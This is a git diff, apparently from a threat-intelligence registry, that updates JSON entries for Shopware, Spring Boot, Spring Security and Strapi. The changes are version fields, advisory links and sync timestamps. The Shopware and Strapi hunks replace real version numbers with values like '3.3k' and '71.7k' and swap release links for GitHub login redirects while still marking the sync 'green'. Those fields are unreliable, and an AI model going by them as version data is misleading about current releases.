"last_version_synced_at": "2026-03-24T09:18:06+00:00",
"latest_version_evidence": [
"GitHub Releases API"
"GitHub Releases API",
"Shopware Security Advisories"
],
"catalog_source": "Shopware Security Advisories",
"catalog_reason": "source catalog exposed a stable security-related object and auto-catalog is enabled",

6
08-threat-intel/registry/entities/shopware.json
查看文件

@@ -12,16 +12,16 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "6.7.8.2",
"latest_version": "3.3k",
"version_scheme": "vendor",
"latest_release_at": "2026-03-18T15:05:49Z",
"latest_release_url": "https://github.com/shopware/shopware/releases/tag/v6.7.8.2",
"latest_release_url": "https://github.com/login?return_to=%2Fshopware%2Fshopware",
"version_source_refs": [
"https://github.com/login?return_to=%2Fshopware%2Fshopware"
],
"version_sync_status": "green",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:05+00:00",
"latest_version_evidence": [
"Shopware Security Advisories"
],

2
08-threat-intel/registry/entities/spring-boot--project--org-springframework-boot-spring-boot.json
查看文件

@@ -21,7 +21,7 @@
],
"version_sync_status": "green",
"security_version_count": 22,
"last_version_synced_at": "2026-03-23T09:54:01+00:00",
"last_version_synced_at": "2026-03-24T09:18:06+00:00",
"latest_version_evidence": [
"advisory-fixed-version",
"https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-cm59-pr5q-cw85"

2
08-threat-intel/registry/entities/spring-boot.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 22,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:06+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/spring-framework.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:54:01+00:00",
"last_version_synced_at": "2026-03-24T09:18:06+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/spring-security--project--org-springframework-security-spring-security-web.json
查看文件

@@ -21,7 +21,7 @@
],
"version_sync_status": "green",
"security_version_count": 92,
"last_version_synced_at": "2026-03-23T09:54:02+00:00",
"last_version_synced_at": "2026-03-24T09:18:07+00:00",
"latest_version_evidence": [
"advisory-fixed-version",
"https://nvd.nist.gov/vuln/detail/CVE-2026-22732"

2
08-threat-intel/registry/entities/spring-security.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 92,
"last_version_synced_at": "2026-03-23T09:54:01+00:00",
"last_version_synced_at": "2026-03-24T09:18:06+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

12
08-threat-intel/registry/entities/strapi--repo--strapi-strapi.json
查看文件

@@ -12,18 +12,20 @@
"repo_url": "https://github.com/strapi/strapi",
"package_registry": "",
"marketplace_url": "",
"latest_version": "5.40.0",
"latest_version": "71.7k",
"version_scheme": "semver-ish",
"latest_release_at": "2026-03-18T13:33:01Z",
"latest_release_url": "https://github.com/strapi/strapi/releases/tag/v5.40.0",
"latest_release_url": "https://github.com/login?return_to=%2Fstrapi%2Fstrapi",
"version_source_refs": [
"https://github.com/strapi/strapi/releases/tag/v5.40.0"
"https://github.com/strapi/strapi/releases/tag/v5.40.0",
"https://github.com/login?return_to=%2Fstrapi%2Fstrapi"
],
"version_sync_status": "green",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:54:02+00:00",
"last_version_synced_at": "2026-03-24T09:18:08+00:00",
"latest_version_evidence": [
"GitHub Releases API"
"GitHub Releases API",
"Strapi GitHub Advisories"
],
"catalog_source": "Strapi GitHub Advisories",
"catalog_reason": "source catalog exposed a stable security-related object and auto-catalog is enabled",

某些文件未显示,因为此 diff 中更改的文件太多 显示更多